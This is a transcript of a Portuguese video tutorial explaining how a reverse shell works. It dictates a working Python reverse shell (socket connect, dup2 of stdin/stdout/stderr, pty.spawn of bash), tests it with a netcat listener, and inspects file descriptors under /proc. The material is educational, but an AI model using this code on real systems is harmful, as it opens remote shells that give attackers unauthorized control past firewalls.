. Você já se perguntou como funciona uma reverse shell? Qual é a mágica de simplesmente executar um arquivo, sua shell ser movida para outra remotamente conectada? Neste vídeo, vamos detalhar sobre como criar e o funcionamento de uma reverse shell utilizando a linguagem Python. Vamos lá. Mas antes, é interessante entendermos o conceito de reverse shell. Chegou até aqui, provavelmente já tem uma ideia sobre. Mas vamos lá. Uma reverse shell nada mais é do que um meio de conexão, onde a máquina do atacante recebe a conexão e acessa a shell de uma máquina comprometida. Basicamente, nesse meio, o atacante executa um comando na máquina comprometida e espera ela se conectar a ele. No padrão, geralmente, a gente tem a conexão feita pela máquina atacante. Por exemplo, a gente acessa um servidor, quem faz a conexão é a gente, quem faz a requisição é a gente, mas, neste caso, não. Neste caso, o atacante atua como receptor. Ele vai receber a conexão ao invés de se conectar diretamente na máquina comprometida. Desta forma, a gente consegue bolar alguns mecanismos de segurança. Até porque é muito mais fácil você acessar um site, como eu falei, um servidor, do que o servidor vir e acessar você sem passar pelo firewall antes. Ok, mas qual a utilidade de uma reverse shell? Bom, basicamente, a reverse shell ou uma backdoor tem diversas utilidades, desde manter acesso a uma determinada máquina para fazer configurações ou modificações futuras, ou fazer acessos remotos, até para você ter acesso aos seus arquivos ou alguma coisa do tipo. Geralmente, os cybercriminosos, os hackers que invadem sistemas efetuando algum crime, utilizam de reverse shells para bolar o sistema de defesa da máquina. Isso, pois a conexão, na maioria das vezes, não é barrada pelo firewall. Certo, agora que sabemos o que é uma reverse shell, vamos à prática. Vamos criar uma reverse shell utilizando a linguagem de programação Python, como eu falei no início, e entender, é claro, o funcionamento básico dela, desde como e o porquê dos files descriptors serem duplicados, até como os comandos são executados. Vamos lá. Vou, então, abrir aqui o terminal. A gente vai utilizar o nano aqui nesta aula. Vou aqui dar um cd desktop. E aqui eu vou dar um clear. Vou dar um nano rev.py. E vamos dar início, então, à nossa programação aqui da nossa reverse shell. Começamos, então, pela primeira linha, que é sempre interessante começar pela shibang, que diz ao shell, basicamente, onde buscar pelo binário que executará esse script. Como é Python, então, eu vou botar aqui, by user, barra bin, barra em python3. Agora, vamos importar quatro bibliotecas padrões. No caso, os, pty, socket e sys, certo? A gente vai entender onde cada uma delas se encaixa logo mais. Certo, como queremos uma reverse shell bonitinha, vamos começar validando a linha de comandos, ou seja, os argumentos que ela vai receber. Como é uma reverse shell básica, vamos aceitar apenas o endereço de IP e porta. Então, vamos validar isso da seguinte maneira. If len sys.argv not equal 3, print, erro. Aqui em file, a gente vai botar para o std, sys.std. Ou seja, se o tamanho do argv for diferente de 3, ele vai imprimir essa mensagem de erro aqui. Além disso, eu quero, é claro, que ele imprima como que eu deva usar esse meu script. Eu vou botar aqui, então, usage. Aqui eu vou botar um traço s, que a gente vai usar a formatação no estilo do c, do printf, né, do format. E aqui eu vou botar ip e port, certo? Porcentagem. E aqui a gente vai passar o sys.argv 0, que é simplesmente o nome do arquivo. Como isso aqui é uma mensagem de informação, eu vou deixar aqui no stdout mesmo, tá? Aqui, isso aqui será no std e isso aqui está sendo escrito no stdout, certo? E aqui eu vou dar um exit com status code 1. Isso para indicar, é claro, que o script não foi executado corretamente, tá? Certo, dessa forma, o nosso script só será executado quando eu ver exatamente 3 parâmetros, incluindo, é claro, o próprio nome do arquivo. Caso não tenha 3 parâmetros, o script vai imprimir essa mensagem de erro aqui e também vai imprimir como que eu deva usar o script, né? Aqui, no caso, seria passar o ip e passar a porta, certo? Vamos fazer o teste, então, aqui. Vou salvar. Vou abrir um outro terminal aqui, ctrl shift d, cd desktop. Na verdade, eu vou abrir na direita aqui, que eu acho que fica mais interessante para ver. E, é claro, eu vou dar um python have.py. E pronto, ele me deu o erro, né, até porque eu não passei nenhum valor. Então, se eu passo, por exemplo, o ip aqui, localhost 3301, ele vai executar corretamente. Se eu passo só o ip, ele vai me dar a mensagem de erro como eu queria, tá? E, é claro, a gente já definiu que o script só será executado quando tiver exatamente 3 parâmetros. A gente precisa descompactar os valores que estão ali em agrivi. Como a gente vai fazer isso? A gente vai botar aqui ip transport igual a sys.agrivi. E, é claro, a gente vai ignorar o primeiro elemento, né? O primeiro elemento, como você deve saber, o primeiro elemento é justamente o nome do arquivo. E o nome do arquivo não nos interessa aqui. A gente só quer pegar o ip e a porta, que são os elementos seguintes, certo? Tudo certo? Posso dar um print ip report, só para ver se está funcionando. Python have.py. Ah, sim, eu esqueci. Localhost 3301. E tá lá, ele me mandou aqui o ip e a porta, certo? Tudo bem. Vamos lá continuar aqui, então. Tirar isso aqui, que isso aqui é inútil. Ok, dessa forma a gente fatiou a lista, então, ignorando, é claro, o primeiro elemento, que é o nome do arquivo. E pegamos o endereço de ip e passamos, é claro, para essas duas variáveis aqui, né? O primeiro elemento é o ip, o segundo é porta e passamos esses valores que foram mandados aqui na linha de comando para essas duas variáveis, certo? Ok, agora que a gente já tem os parâmetros armazenados em duas variáveis bonitinhas, Ok, agora que a gente já tem os parâmetros armazenados aqui dentro do meu código, a gente vai criar uma conexão e criar um socket. Vamos lá. Primeiramente, a gente vai botar um socket, igual a socket.socket. Pronto. E, basicamente, aqui a gente poderia informar a família aqui, poderia pôr, por exemplo, para criar um socket UDP ou TCP, mas aqui a gente está definindo apenas socket, a gente não precisa definir aqui TCP e nem IP, até porque o padrão dessa função é justamente esses dois, né? E quando eu boto apenas socket.socket, ele vai criar um socket TCP e IP. A gente não precisa informar nem a família, nem o tipo. A não ser, é claro, que a gente queira outro tipo ou outra família, certo? Ok, agora que temos um socket, vamos efetuar a conexão com a máquina que receberá a shell, né? Fazemos isso com simplesmente socket.connect. E a gente passa uma dupla, que é justamente o IP e porta. Mas perceba aqui que a gente precisa fazer a conversão da porta, porque o padrão da linha de comando é ler a porta, aqui o port como uma string. Então, a gente precisa converter, é claro, para inteiro, porque esse socket.connect, essa função connect, ela recebe uma string, que é o endereço de IP, e o inteiro, que é justamente o número da porta, beleza? Aqui, basicamente, a gente já fez a conexão com a máquina que receberá a shell. Mas, é claro, a gente não tem a nossa shell funcionando, né? Eu só tenho a conexão mantida aqui com a máquina que receberá a shell. Então, agora a gente precisa fazer uma das partes mais importantes, que é a duplicação dos files do script. Entenderemos o porquê disso logo mais. Vamos fazer então? Então, vamos escrever aqui, for fd in range 0 até 3. Isso aqui, na verdade, vai de 0 até 2, tá? Esse 3 aqui não é incluso, certo? Então, vou botar aqui, os.dup2.soc.file.no, que é justamente o file descriptor do socket, desse socket aqui. E aqui, no caso, seria o fd, que vai entender já já porquê que a gente precisa fazer essa duplicação de file descriptor, certo? Ok, agora que a gente duplicou os files descriptors, vamos então fazer a parte mais importante, né? Que é spawnar uma shell. A gente vai usar, então, uma função da biblioteca pty, que é .spawn. Então, a gente bota aqui pty.spawn, barra bin, barra dash. Salvar aqui, é claro. Certo, temos uma revest shell. Vamos, então, testá-la para ver se está funcionando corretamente. Vamos lá. Vou, então, abrir aqui um terminal na direita, que você deu um desktop. Dá um python. Na verdade, eu preciso abrir uma conexão aqui no netcat, né? Então, vou botar aqui .shiftd, dá o nc-lvnp3301, para ficar esperando uma conexão aqui com o netcat. Pronto, está ouvindo aqui na porta 3301. E agora, eu vou executar o python, rev.py, no localhost, na porta 3301. E vou lá. Minha shell está funcionando aqui direitinho, né? Eu já consigo executar tudo o que eu quiser dentro desse meu processo. Na verdade, aqui em cima, né? Dentro desse meu terminal aqui. É como se essa máquina aqui fosse a máquina comprometida. E aqui seria a máquina do atacante, certo? Então, a máquina comprometida fez a conexão aqui para a máquina do atacante, que estava simplesmente esperando a conexão, certo? Posso dar um exit aqui para sair da shell. Perceba aqui também o meu processo parou, beleza? Certo, vamos lá entender algumas partes essenciais que a gente acabou pulando aqui. Vamos lá. Certo, como eu disse, as primeiras linhas basicamente efetuam a análise dos dados, né? Como a porta, endereço de IP, e os salva em duas variáveis, né? A variável de IP e a variável de porta. Logo depois, temos a criação do nosso socket TCPIP, que, como falei, é a família e o tipo padrão dessa funçãozinha .socket. Após isso, efetuamos a conexão com a máquina que receberá acesso à shell. E aqui entra uma das partes mais importantes, né? A duplicação de file descriptors. Por que a gente fez isso? Bom, para entender isso, precisamos de uma modificação no nosso código. Vamos lá. Vou vir aqui. Antes do for aqui, onde ele faz a duplicação, eu vou botar input. Vou botar três pontinhos aqui, só para esperar, para fazer uma pausa, né? Antes dele fazer a duplicação de file descriptors. Eu vou salvar e vou abrir um novo terminal aqui na direita. E aqui embaixo também. Vou abrir uma conexão no netcat aqui, escutar uma conexão na porta 3301. Na verdade, eu preciso de mais um terminal. E pronto. Aqui nesse terminal, eu vou executar a minha shell, então. Eu vou dar um python. Heave.py 27.0.1 3301. Percebam aqui que ele fez a conexão. Ele fez, então, essa primeira linha aqui, que é a socket.connect. Ele fez a conexão. Porém, eu não consigo executar nada aqui. Eu posso dar um id. Ewd. Que a minha shell não está funcionando, né? Por quê? A gente vai entender isso agora. Além da minha shell não ser spawnada aqui em pty.spawn.abin-best, os meus files descriptors ainda não foram duplicados, né? Então, antes de spawnar a shell, a gente precisa fazer essa duplicação. Vamos dar uma olhadinha ali dentro desse processo do python. Vou dar um pdf.python. E aqui a gente tem o pid desse processo. Então, eu vou dar um ls-l-proc-7131-fd para a gente ver os files descriptors desse processo, né? Que é o processo desse meu python aqui em execução, certo? E aqui eu quero que vocês prestem atenção em algumas coisas. Perceba que o zero é o link simbólico para o terminal 3, né? Que é justamente esse terminal que iniciou o processo do python. Iniciou essa shell. Ou seja, tudo que o stdin for ler, ele vai ler daqui desse terminal, do terminal 3, ou seja, desse meu terminal aqui, certo? Além disso, o stdout está apontando para esse mesmo terminal. Ou seja, toda mensagem que foi impressa, todo erro que foi impresso, ele vai ser mandado aqui para esse meu terminal. O pts-3, que é justamente o terminal que iniciou a reverse shell, certo? Mas perceba que, é claro, eu parei aqui na conexão. Eu parei aqui dentro dessa conexão aqui. Eu ainda não fiz a duplicação de files descriptors. Quando eu executar aqui, eu vou dar um enter. Perceba que eu tive acesso aqui à minha shell. Os meus files descriptors foram duplicados. A gente vai ver isso já. E a minha shell foi spawnada. Então, ele executou isso aqui. Ele não tinha executado porque eu estava com o input aqui travando a execução do script, certo? Então, aqui eu já posso, por exemplo, um id, pwd, certo? Então, aqui eu estou dentro da minha máquina. Já eu estou tendo acesso à máquina que seria a máquina comprometida. Se eu der um ls agora de novo, ali no processo do meu Python, quero que vocês percebam a diferença. Veja que, agora, o zero, que é justamente o stdin, o standard input, ele está recebendo os dados diretamente do socket. E esse socket, para quem não sabe, ele está apontando aqui para a minha conexão, né? Ou seja, tudo que eu digito aqui, ele vai enviar para o stdin, para esse zero aqui, que é justamente esse socket, né? O socket, ele vai enviar para esse zero, que é o standard input desse meu processo aqui do Python. Então, basicamente, tudo que esse meu processo aqui, na verdade, essa minha shell for ler, ela vai ler desse socket aqui. E também, tudo que ela for escrever, todos os erros, todas as mensagens, ela vai mandar para esse socket aqui. Então, por isso que é feita essa duplicação de file descriptor, né? Para que a gente consiga, então, manter essa conexão e, é claro, ter acesso à shell da máquina comprometida, né? Então, tudo que eu digito aqui embaixo, nessa shell aqui, por exemplo, pwd, isso aqui é enviado para esse socket aqui. E como vocês podem ver, o stdin, o standard input, ele está recebendo desse socket. Então, ele vai executar aqui dentro desse shell, certo? Isso, é claro, perceba que não ocorre só para o standard input, né? O 1, o 2 e o 3, né? Que, nesse caso, seria um outro file descriptor aí que está sendo usado para alguma coisa. Eles estão apontando justamente para o socket da nossa conexão aqui embaixo, né? Do nosso netcat. Ou seja, tudo que seria escrito aqui no stdout vai ser jogado para cá, para esse socket, que vai ser jogado para cá, para a minha shell, certo? Dessa forma, basicamente, direcionamos o que seria ali do barra escrito do terminal que iniciou o processo, que foi esse terminal aqui, para o arquivo de socket, né? Que faz justamente a conexão com a máquina que recebe a shell. E, por último, mas não menos importante, temos o pty.spawn, barra bin, barra bash. O que isso faz nada mais é que iniciar um pseudo-terminal, uma shell, no processo atual. E, quando ele inicia esse pseudo-terminal, majoritariamente, ele vai ler do stdin do processo que iniciou esse comando, né? Nesse caso, seria esse terminal aqui. Mas, como a gente fez a duplicação de file descriptors, na verdade, ele vai ler não daqui mais, mas sim do nosso socket, que está apontando justamente para a nossa conexão aqui do netcat, certo? Bom, é isso. Chegamos ao fim da nossa aula. Se você gostou, deixe o like e compartilhe com seus amigos que curtem conteúdos assim. Comente aí também sugestões de vídeos que vocês querem ver por aqui. Por isso é hoje. Valeu!